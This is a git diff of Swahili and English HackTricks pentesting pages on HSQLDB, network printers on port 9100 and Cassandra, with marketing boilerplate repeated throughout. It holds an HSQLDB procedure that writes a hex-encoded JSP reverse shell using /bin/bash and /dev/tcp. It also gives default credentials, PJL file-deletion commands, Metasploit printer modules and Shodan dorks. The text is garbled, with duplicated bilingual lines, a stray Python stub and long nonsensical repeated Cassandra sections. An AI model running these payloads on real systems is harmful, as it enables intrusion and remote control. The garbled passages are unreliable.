Tafadhali kumbuka kuwa kwa chaguo-msingi huduma hii inaweza kuendeshwa kwenye kumbukumbu au imefungwa kwenye localhost. Ikiwa umepata huduma hii, labda umetumia huduma nyingine na unatafuta kuongeza mamlaka.
Kumbuka kwamba kwa default huduma hii inawezekana inafanya kazi katika kumbukumbu au imefungwa kwa localhost. Ikiwa umeipata, huenda umepata huduma nyingine na unatafuta kuongeza mamlaka.
Kitambulisho cha chaguo-msingi kawaida ni `sa` na neno la siri tupu.
Maalum ya default mara nyingi ni `sa` bila nenosiri.
Ikiwa umetumia huduma nyingine, tafuta kitambulisho kinachowezekana kwa kutumia
Ikiwa umefanikiwa katika huduma nyingine, tafuta maelezo yanayowezekana kwa kutumia
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
Chukua jina la database kwa umakini - utalihitaji kuunganisha.
Note the database name carefully - youll need it to connect.
# Kukusanya Taarifa
# Info Gathering
Unaweza kuunganisha kwenye kifaa cha DB kwa [kupakua HSQLDB](https://sourceforge.net/projects/hsqldb/files/) na kuchambua `hsqldb/lib/hsqldb.jar`. Chalisha programu ya GUI (eww) kwa kutumia `java -jar hsqldb.jar` na unganisha kwenye kifaa kwa kutumia siri zilizopatikana/dhaifu.
Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials.
Chukua taarifa ya uunganisho URL itaonekana kama hii kwa mfumo wa mbali: `jdbc:hsqldb:hsql://ip/DBNAME`.
Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`.
# Mbinu
# Tricks
## Rutini za Lugha ya Java
## Java Language Routines
Tunaweza kuita njia za static za darasa la Java kutoka HSQLDB kwa kutumia Rutini za Lugha ya Java. Tambua kwamba darasa linaloitwa linahitaji kuwa kwenye njia ya darasa ya programu.
We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the applications classpath.
JRTs zinaweza kuwa `kazi` au `taratibu`. Kazi zinaweza kuitwa kupitia taarifa za SQL ikiwa njia ya Java inarudisha moja au zaidi ya pembejeo za SQL zinazoweza kulinganishwa. Zinaitwa kwa kutumia taarifa ya `VALUES`.
JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement.
Ikiwa njia ya Java tunayotaka kuita inarudisha void, tunahitaji kutumia taratibu zinazoitwa kwa kutumia taarifa ya `CALL`.
If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement.
## Kusoma Mali za Mfumo wa Java
## Reading Java System Properties
Unda kazi:
Create function:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
```python
def execute():
# Code to execute the function
pass
```
```python
def tekeleza():
# Nambari ya kutekeleza kazi
pass
```
Tekeleza kazi:
```text
VALUES(getsystemproperty('user.name'))
```
Unaweza kupata [orodha ya mali za mfumo hapa](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
## Andika Yaliyomo kwenye Faili
## Andika Maudhui kwenye Faili
Unaweza kutumia kifaa cha Java `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` kilichopo kwenye JDK \(kimepakuliwa moja kwa moja kwenye njia ya darasa ya programu\) kuandika vitu vilivyohifadhiwa kwa mfumo wa hex kwenye diski kupitia utaratibu maalum. **Tafadhali kumbuka ukubwa wa juu wa 1024 baiti**.
You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Kumbuka ukubwa wa juu wa 1024 bytes**.
Unda utaratibu:
Create procedure:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
Chukua hatua:
Tekeleza utaratibu:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

72
network-services-pentesting/9100-pjl.md
View file

@ -1,45 +1,32 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Kutoka [hapa](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Uchapishaji ghafi ndio tunayotaja kama mchakato wa kufanya uhusiano na bandari 9100/tcp ya printer ya mtandao. Ni njia ya msingi inayotumiwa na CUPS na muundo wa uchapishaji wa Windows kuwasiliana na printa za mtandao kwani inachukuliwa kama '_itifaki rahisi zaidi, ya haraka, na kwa ujumla itifaki ya mtandao yenye uaminifu zaidi inayotumiwa kwa printa_'. Uchapishaji wa bandari ghafi 9100, unaoitwa pia JetDirect, AppSocket au PDL-datastream kimsingi **siyo itifaki ya uchapishaji yenyewe**. Badala yake, **data yote iliyotumwa inashughulikiwa moja kwa moja na kifaa cha uchapishaji**, kama vile uhusiano wa parallel kupitia TCP. Tofauti na LPD, IPP na SMB, hii inaweza kutuma maoni moja kwa moja kwa mteja, ikiwa ni pamoja na hali na ujumbe wa hitilafu. Kituo cha **bidirectional** kama hicho kinatupa **upatikanaji** wa **moja kwa moja** kwa **matokeo** ya amri za **PJL**, **PostScript** au **PCL**. Kwa hivyo, uchapishaji wa bandari ghafi 9100 - ambao unatumiwa na karibu kila printer ya mtandao - hutumiwa kama njia ya uchambuzi wa usalama na PRET na PFT.
Kutoka [hapa](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Uchapishaji wa raw ni kile tunachofafanua kama mchakato wa kuunganisha kwenye bandari 9100/tcp ya printer ya mtandao. Ni njia ya default inayotumiwa na CUPS na usanifu wa uchapishaji wa Windows kuwasiliana na printers za mtandao kwani inachukuliwa kuwa _njia rahisi, ya haraka, na kwa ujumla protokali ya mtandao inayotegemewa zaidi inayotumiwa kwa printers_. Uchapishaji wa bandari 9100 wa raw, pia unajulikana kama JetDirect, AppSocket au PDL-datastream kwa kweli **si protokali ya uchapishaji yenyewe**. Badala yake **data zote zinazotumwa zinachakatwa moja kwa moja na kifaa cha uchapishaji**, kama vile muunganisho wa sambamba kupitia TCP. Kinyume na LPD, IPP na SMB, hii inaweza kutuma mrejesho wa moja kwa moja kwa mteja, ikiwa ni pamoja na hali na ujumbe wa makosa. **Kanal ya pande mbili** kama hii inatupa **ufikiaji** wa moja kwa moja kwa **matokeo** ya **PJL**, **PostScript** au **PCL** amri. Kwa hivyo uchapishaji wa bandari 9100 wa raw ambao unasaidiwa na karibu printer yoyote ya mtandao unatumiwa kama njia ya uchambuzi wa usalama na PRET na PFT.
Ikiwa unataka kujifunza zaidi kuhusu [**kudukua printa soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
Ikiwa unataka kujifunza zaidi kuhusu [**kuvamia printers soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
**Bandari ya chaguo-msingi:** 9100
**Bandari ya default:** 9100
```
9100/tcp open jetdirect
```
# Uchambuzi
# Uhesabu
## Kwa Mkono
### PJL (Printer Job Language)
PJL ni lugha ya amri iliyoundwa kwa ajili ya kudhibiti vifaa vya uchapishaji. Inatumika kwa kuanzisha na kusimamia kazi za uchapishaji kwenye vifaa vya uchapishaji. PJL inaweza kutumiwa kwa kudhibiti vigezo vya uchapishaji kama vile ukubwa wa karatasi, aina ya karatasi, na upangaji wa ukurasa.
Kwa kuchunguza vifaa vya uchapishaji kwa kutumia PJL, unaweza kupata habari muhimu kama vile:
- Jina la mfano wa kifaa cha uchapishaji
- Namba ya toleo la firmware
- Habari za mtandao kama anwani ya IP na anwani ya MAC
- Vigezo vya uchapishaji kama vile ukubwa wa karatasi na aina ya karatasi
- Uwezo wa kudhibiti kazi za uchapishaji kama kuanzisha, kusimamisha, au kufuta kazi za uchapishaji
Kwa kufanya uchunguzi wa PJL, unaweza kupata habari muhimu kuhusu vifaa vya uchapishaji na kutumia habari hiyo kwa uchambuzi zaidi au kwa shughuli za udukuzi.
## Mikono
```bash
nc -vn <IP> 9100
@PJL INFO STATUS #CODE=40000 DISPLAY="Sleep" ONLINE=TRUE
@ -57,14 +44,6 @@ nc -vn <IP> 9100
@PJL FSDELETE #Useful to delete a file
```
## Kiotomatiki
Pamoja na teknolojia ya kiotomatiki, unaweza kufanya shughuli za kiotomatiki bila kuingilia kati kwa mikono. Hii inaweza kuwa na manufaa katika muktadha wa udukuzi wa mtandao, kwani inaweza kukusaidia kufanya shughuli nyingi kwa haraka na kwa ufanisi.
Kuna njia kadhaa za kufanya kiotomatiki katika udukuzi wa mtandao. Moja ya njia hizo ni kutumia skrini ya kiotomatiki, ambayo inaruhusu kurekodi na kucheza tena hatua zilizochukuliwa kwenye kifaa. Hii inaweza kuwa na manufaa katika kudukua huduma za mtandao ambazo zinahitaji hatua nyingi za kuingia au kufanya shughuli fulani.
Njia nyingine ya kiotomatiki ni kutumia lugha ya programu kama Python au Bash kufanya shughuli za kiotomatiki. Unaweza kuandika skripti ambazo zinafanya hatua zinazohitajika kwa udukuzi wa mtandao, kama vile kuingia kiotomatiki kwenye huduma au kufanya uchunguzi wa usalama.
Kwa kumalizia, teknolojia ya kiotomatiki inaweza kuwa rasilimali muhimu katika udukuzi wa mtandao. Inakuruhusu kufanya shughuli nyingi kwa haraka na kwa ufanisi, na inaweza kuokoa muda na juhudi zako. Hata hivyo, ni muhimu kutumia teknolojia hii kwa uwajibikaji na kuzingatia sheria na maadili ya udukuzi wa mtandao.
```bash
nmap -sV --script pjl-ready-message -p <PORT> <IP>
```
@ -79,9 +58,9 @@ msf> use auxiliary/scanner/printer/printer_download_file
msf> use auxiliary/scanner/printer/printer_upload_file
msf> use auxiliary/scanner/printer/printer_delete_file
```
## Kifaa cha Kudukua Printers
## Printers Hacking tool
Hii ni zana unayotaka kutumia kudhulumu printers:
Hii ni zana unayotaka kutumia kuharibu printers:
{% embed url="https://github.com/RUB-NDS/PRET" %}
@ -90,16 +69,17 @@ Hii ni zana unayotaka kutumia kudhulumu printers:
* `pjl port:9100`
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

324
network-services-pentesting/cassandra.md
View file

@ -1,302 +1,35 @@
# 9042/9160 - Kupima Usalama wa Cassandra
# 9042/9160 - Pentesting Cassandra
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**Apache Cassandra** ni **mfumo wa hifadhidata uliogawanyika** unaoweza kusambazwa sana, wenye **utendaji wa juu**, ulioundwa kushughulikia **kiasi kikubwa cha data** kwenye **seva nyingi za kawaida**, huku ukihakikisha **upatikanaji wa juu** bila **kitovu cha kushindwa**. Ni aina ya **hifadhidata ya NoSQL**.
**Apache Cassandra** ni **database** ya **kugawanywa** yenye **uwezo mkubwa wa kupanuka** na **utendaji wa juu** iliyoundwa kushughulikia **kiasi kikubwa cha data** kwenye **seva za kawaida**, ikitoa **upatikanaji wa juu** bila **nukta moja ya kushindwa**. Ni aina ya **NoSQL database**.
Katika hali kadhaa, unaweza kugundua kuwa Cassandra inakubali **vyeti vyovyote** (kwa kuwa hakuna vyeti vilivyowekwa) na hii inaweza kumruhusu mshambuliaji kufanya **uchambuzi** wa hifadhidata.
Katika hali kadhaa, unaweza kupata kwamba Cassandra inakubali **akili yoyote** (kwa sababu hakuna zilizowekwa) na hii inaweza kuruhusu mshambuliaji **kuhesabu** database.
**Bandari ya chaguo:** 9042,9160
**Bandari ya kawaida:** 9042,9160
```
PORT STATE SERVICE REASON
9042/tcp open cassandra-native Apache Cassandra 3.10 or later (native protocol versions 3/v3, 4/v4, 5/v5-beta)
9160/tcp open cassandra syn-ack
```
## Uchunguzi
## Enumeration
### Kwa Mkono
#### Kupata Nodes za Cassandra
Kutumia nodetool, unaweza kupata orodha ya nodes za Cassandra zinazofanya kazi kwenye mfumo:
```bash
nodetool status
```
#### Kupata Keyspaces
Kutumia cqlsh, unaweza kupata orodha ya keyspaces zilizopo kwenye mfumo:
```bash
DESCRIBE keyspaces;
```
#### Kupata Tables
Kutumia cqlsh, unaweza kupata orodha ya tables zilizopo kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Columns
Kutumia cqlsh, unaweza kupata orodha ya columns zilizopo kwenye table fulani:
```bash
USE keyspace_name;
SELECT * FROM table_name LIMIT 1;
```
#### Kupata Data
Kutumia cqlsh, unaweza kupata data iliyopo kwenye table fulani:
```bash
USE keyspace_name;
SELECT * FROM table_name;
```
#### Kupata Uthibitishaji wa Nje
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa nje uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Ndani
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa ndani uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Jumla
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa jumla uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikoa
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikoa uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Mtumiaji
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa mtumiaji uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha kikundi uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Jukumu
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha jukumu uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
#### Kupata Uthibitishaji wa Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Kikundi cha Rasilimali
Kutumia cqlsh, unaweza kupata orodha ya uthibitishaji wa kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha kikundi cha rasilimali uliowekwa kwenye keyspace fulani:
```bash
USE keyspace_name;
DESCRIBE tables;
```
### Manual
```bash
pip install cqlsh
cqlsh <IP>
@ -311,9 +44,9 @@ SELECT * from logdb.user_auth; #Can contain credential hashes
SELECT * from logdb.user;
SELECT * from configuration."config";
```
### Kiotomatiki
### Automated
Hapa hakuna chaguo nyingi na nmap hupata habari kidogo sana.
Hapa hakuna chaguzi nyingi na nmap haipati taarifa nyingi
```bash
nmap -sV --script cassandra-info -p <PORT> <IP>
```
@ -321,19 +54,20 @@ nmap -sV --script cassandra-info -p <PORT> <IP>
### **Shodan**
`port:9160 Kikundi`\
`port:9042 "Toleo la itifaki lisiloungwa mkono au lisiloungwa mkono"`
`port:9160 Cluster`\
`port:9042 "Invalid or unsupported protocol version"`
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
